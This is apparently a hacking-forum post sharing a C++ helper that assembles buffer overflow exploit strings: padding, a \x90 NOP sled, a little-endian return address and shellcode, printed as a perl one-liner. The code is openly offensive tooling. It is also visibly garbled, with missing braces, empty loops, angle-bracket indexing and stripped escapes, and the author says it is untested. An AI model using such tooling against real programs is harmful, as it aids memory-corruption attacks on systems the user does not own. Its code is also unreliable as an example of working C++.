I've written a fairly small buffer overflow tool to help your buffer overflow testing and exploiting go faster. It can be pretty annoying trying to retype everything when you are attempting to exploit a BOF vuln program. I created this tool with the intention of helping others spend less time crafting their BOF exploits and more time actually exploiting Icon_biggrin. Some the code is a bit sloppy since I was rushing through it and I'm aware that some of the things aren't really needed or could have been done using bitwise operators but in my opinion I think it's pretty good and I hope you enjoy it.
#include <iostream>
#include <string>
#include <stdio.h>
#include <cstring>
using namespace std;
int main()
//Written by BreakingSec.org
//Please give credit if you edit or change this code to Breaking Secuirty
//Have fun and sorry If it's not to well coded I was in a rush and used a lot of shortcuts.
cout << "n---------------------------------nThis tool helps you craft your buffer overflow attacks on the fly n";
cout << "This tool gives you the ability to easly convert memory addressnor even shellcode into little endian formatn";
cout << "This tool can help you create those annoying to craft buffer overnexploitation strings and helps your easly testn";
cout << "and exploit BOF vulnerable programs.n";
cout << "nIf you don't want to use one of the optionsn";
cout << "simply put a 0 in the feild.n---------------------------------nn";
string input;
int limit = 0;
int nopsledsize = 0;
string shellcode;
cout << "Enter address or shellcode to convert: ";
cin >> input;
cout << "Enter BOF limit as an integer: ";
cin >> limit;
cout << "Enter desired NOP sled length: ";
cin >> nopsledsize;
cout << "Enter desired normal shellcode: ";
cin >> shellcode;
//Find the end of inputed text
int End = input.size();
cout << End << "n";
//Check if input is odd or even so we can add a 0 to the text to get the correct output ;D
int Size = input.size();
double Check = input.size();
Check = Check / 2;
int Verify = Size / 2;
cout << Check << "n" << Verify << "n";
if (Check == Verify)
cout << "Is an even number!n";
cout << "Is not an even number!n";
string zero = "0";
Size = input.size();
End = input.size();
cout << "nn" << End << "nn" << Size << "nn" << input << "nn";
//That took a while xD
int NextNumber;
string final;
int counter = 0;
//check if it's zero
if(input<2> == 00)
counter = Size;
//Create while loop to change order
End = End - 1;
NextNumber = End - 1;
cout << input.size() << "n";
final = final + "x" + input<NextNumber> + input<End>;
End = NextNumber;
//Keeping it all clean ;D
if (input<NextNumber>==NULL||input<End>==NULL)
counter = Size;
//Now it's time for the BOF limit overflower
int limitcount = 0;
string overthetop;
limitcount = limit;
overthetop = overthetop + "A";
//Now it's time for the NOP sled
int nopcount = 0;
nopcount = nopsledsize;
string NOPsled;
NOPsled = NOPsled + "" + "x90";
cout << "nCompleted... nnFinal output:n-----------------------------------------n" ;;
cout << "n`perl -e 'print "" << overthetop << NOPsled << final << shellcode << ""'`nn--------------------------------------- --n";
It outputs a perl command which will exploit the Buffer overflow prone program if used correctly, I haven't necessarily tested it and it's still in its testing stages but I hope to shorten up some of the code and tidy up a bit real soon, until then I hope you find the above code both useful and exciting.